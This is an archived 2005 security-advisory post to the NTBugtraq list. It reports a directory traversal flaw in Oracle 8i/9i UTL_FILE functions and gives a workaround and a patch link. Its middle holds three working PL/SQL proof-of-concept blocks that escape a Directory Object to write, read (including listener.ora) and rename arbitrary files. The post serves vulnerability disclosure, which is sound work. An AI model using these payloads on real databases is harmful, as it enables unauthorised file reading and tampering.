- Argeniss - Oracle Database Server Directory transversal

From: Cesar (cesarc56_at_YAHOO.COM)
Date: 03/08/05

  • Next message: James Rankin: "LAND attack vulnerability on Windows Server 2003 and Windows XP" 
    Date:         Mon, 7 Mar 2005 15:21:25 -0800
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    Argeniss Security Advisory

    Name: Oracle Database Server Directory transversal
    Affected Software: Oracle Database Server versions 8i
    and 9i
    Severity : Medium
    Remote exploitable: Yes (Authentication to Database
    Server is needed)
    Credits: Cesar Cerrudo
    Date: 03/07/05
    Advisory Number: ARG030501

    Details:

    Oracle Database Server provides many packages
    functions to access the OS file system, some of these
    functions are not able to access files directly, for
    example in order to access files a Directory Object
    must be created and grant to users permissions on the
    object, this object references a directory in the
    file system and it can be used by functions to access
    files under that directory only. However functions
    don't properly validate the input and by supplying a
    especially constructed string the directory can be
    escaped and the parent directories can be accessed,
    because of this any file in the same drive
    as the directory, can be read, renamed, overwrited,
    etc.

    To reproduce the vulnerability execute the next
    PL/SQL:
    (In older Oracle database server versions the same
    could work just using "\..\..\")
    (This is not a extensive list of vulnerable functions,
    other functions that parse files could
    also be vulnerable)

    --this create a file called Unbreakable.txt in the
    same drive as the directory referenced by
    --MEDIA_DIR directory object.
    declare
    f utl_file.file_type;
    begin
    f:=UTL_FILE.FOPEN
    ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\Unbreakable.txt','w',1000);
    UTL_FILE.PUT_LINE (f,'Sure',TRUE);
    UTL_FILE.FCLOSE(f);
    end;

    --this example can be used to read arbitrary files in
    the same drive as the directory referenced by
    --MEDIA_DIR directory object.
    SET SERVEROUTPUT ON
    declare
    f utl_file.file_type;
    sBuffer Varchar(8000);
    begin
    f:=UTL_FILE.FOPEN
    ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\OracleDir\ora90\network\ADMIN\listener.ora','r');
    loop
      UTL_FILE.GET_LINE (f,sBuffer);
      DBMS_OUTPUT.PUT_LINE(sBuffer);
    end loop;
    EXCEPTION
    when no_data_found then
    UTL_FILE.FCLOSE(f);
    end;

    --this rename any file in the same drive as the
    directory referenced by
    --MEDIA_DIR directory object
    begin

    UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\FileToRename','MEDIA_DIR','\\.\\..\\.\\..\\.\\Unbreakable.txt',TRUE);
    end;

    By default UTL_FILE package has execute permission to
    public role so any Oracle database
    user with permissions on a Directory Object can
    exploit this vulnerability.
    Explotation of this vulnerability allow an attacker to
    overwrite, read, rename, etc.
    arbitrary files.

    Vendor Status:

    Oracle was contacted on October 2003, after an initial
    email interchange i didn't have any
    news about when the vulnerability was going to be
    patched or when it was patched nor i was credited,
    but this is common when dealing with Oracle on
    security issues.

    Workaround:

    Restrict access to Directory Objects and UTL_FILE
    package.

    Patch Available:

    http://metalink.oracle.com

    Links:

    http://www.argeniss.com/research/ARGENISS-ADV-030501.txt
    http://www.petefinnigan.com/directory_traversal.pdf
    http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf

    Important!!!!!!!!

    There are still hundreds of unpatched Oracle Database
    Server vulnerabilities affecting
    versions 8i, 9i and 10g some of them have been
    reported more than 1 year ago.
    If you want to know more about these vulnerabilities
    and many others check out our
    AVI (Advanced Vulnerability Information) service at
    http://www.argeniss.com/services.html

    -----------------------------------
    --Argeniss - Information Security--
    -----http://www.argeniss.com-------
    ------info>at<argeniss.com---------
    -----------------------------------

    __________________________________________________
    Do You Yahoo!?
    Tired of spam? Yahoo! Mail has the best spam protection around
    http://mail.yahoo.com 

    --
NTBugtraq Editor's Note:
Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
--
  • Next message: James Rankin: "LAND attack vulnerability on Windows Server 2003 and Windows XP"